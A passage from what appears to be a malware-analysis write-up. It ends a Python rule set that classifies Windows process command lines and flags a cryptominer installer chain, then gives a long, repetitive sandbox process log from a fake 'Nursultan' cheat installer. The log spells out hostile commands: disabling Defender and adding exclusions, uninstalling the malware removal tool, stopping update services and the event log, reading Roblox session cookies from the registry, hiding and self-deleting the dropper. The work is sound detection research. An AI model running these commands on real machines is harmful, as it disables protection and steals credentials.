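    (r"C:\Windows\SYSTEM32\attrib.exe", r'"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"'),
    (r"C:\Windows\System32\Wbem\wmic.exe", r'"wmic.exe" csproduct get uuid'),
]

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
SYSTEM_NAMES = {"svchost", "csrss", "lsass", "winlogon", "explorer"}  # task names worth a masquerade check
USER_WRITABLE = re.compile(r"^[A-Z]:\\(ProgramData|Users)\\", re.IGNORECASE)
MSRT_KB = "890830"  # Windows Malicious Software Removal Tool


def _tokens(cmdline):
    """Split on whitespace, keeping double-quoted arguments together and unquoting them."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(image, cmdline):
    """Return (tactic, rule, detail) tuples for one recorded process."""
    name = image.rsplit("\\", 1)[-1].lower()
    tokens, low, found = _tokens(cmdline), cmdline.lower(), []
    if name == "schtasks.exe" and "/create" in low:
        # A flag without a value absorbs the next token; only /tn /tr /sc /mo /rl are read.
        opts = {tokens[i].lower(): tokens[i + 1]
                for i in range(len(tokens) - 1) if tokens[i].startswith("/")}
        tn, tr = opts.get("/tn", ""), opts.get("/tr", "")
        detail = f"task {tn} runs {tr} every {opts.get('/mo', '?')} {opts.get('/sc', '?')}"
        masq = tn.lower() in SYSTEM_NAMES and USER_WRITABLE.match(tr)
        found.append(("persistence", "schtasks_masquerade" if masq else "schtasks_create", detail))
        if opts.get("/rl", "").upper() == "HIGHEST":
            found.append(("privilege-escalation", "schtasks_highest", tn))
    elif name == "sc.exe" and len(tokens) >= 3:
        verb, target = tokens[1].lower(), tokens[2]
        if verb == "stop" and target.lower() in UPDATE_SERVICES:
            found.append(("impact", "stop_update_service", target))
        elif verb == "stop" and target.lower() == "eventlog":
            found.append(("defense-evasion", "stop_eventlog", target))
        elif verb == "create":
            m = re.search(r'binpath=\s*("[^"]*"|\S+)', cmdline, re.IGNORECASE)
            binpath = m.group(1).strip('"') if m else ""
            rule = "service_in_user_writable_dir" if USER_WRITABLE.match(binpath) else "service_create"
            found.append(("persistence", rule, f"{target} -> {binpath}"))
    elif name == "cmd.exe":
        kb = re.search(r"/kb:(\d+)", low)
        if "wusa" in low and "/uninstall" in low and kb:
            what = "MSRT" if kb.group(1) == MSRT_KB else "update"
            found.append(("defense-evasion", "wusa_uninstall_update", f"KB{kb.group(1)} ({what})"))
        m = re.search(r'\bdel\b[^"]*"([^"]+)"', cmdline, re.IGNORECASE)
        if m and "ping" in low:  # ping as a sleep, then delete the dropper
            found.append(("defense-evasion", "delayed_self_delete", m.group(1)))
    elif name == "attrib.exe" and {"+h", "+s"} & {t.lower() for t in tokens}:
        found.append(("defense-evasion", "hide_file", tokens[-1]))
    elif name == "powercfg.exe":
        m = re.search(r"-(standby|hibernate|monitor)-timeout-(ac|dc)\s+0\b", low)
        if m:
            found.append(("persistence", "power_settings", m.group(0)))
    elif name == "wmic.exe":
        found.append(("discovery", "wmic_hardware_query", " ".join(tokens[1:])))
    return found


def rules(image, cmdline):
    """Rule names only, in the order they fired."""
    return [rule for _, rule, _ in classify(image, cmdline)]


def miner_install_chain(processes):
    """True when a service was installed from a user-writable path, the event log was
    stopped and sleep was disabled: the XMRig installer pattern recorded above."""
    fired = {rule for image, cmd in processes for rule in rules(image, cmd)}
    return {"service_in_user_writable_dir", "stop_eventlog", "power_settings"} <= fired


if __name__ == "__main__":
    for image, cmdline in SAMPLE_PROCESSES:
        for tactic, rule, detail in classify(image, cmdline):
            print(f"{tactic:<20} {rule:<28} {detail}")
    print("miner install chain:", miner_install_chain(SAMPLE_PROCESSES))
```

The correlation deliberately keys on the service path rather than the service name: XMRKNZQC and the scppqqgespxv\jqvljmboayxs.exe file name are random per build, while a service whose binary lives under ProgramData or a user profile, combined with the event log being stopped and sleep disabled, is stable across variants of this installer.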

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

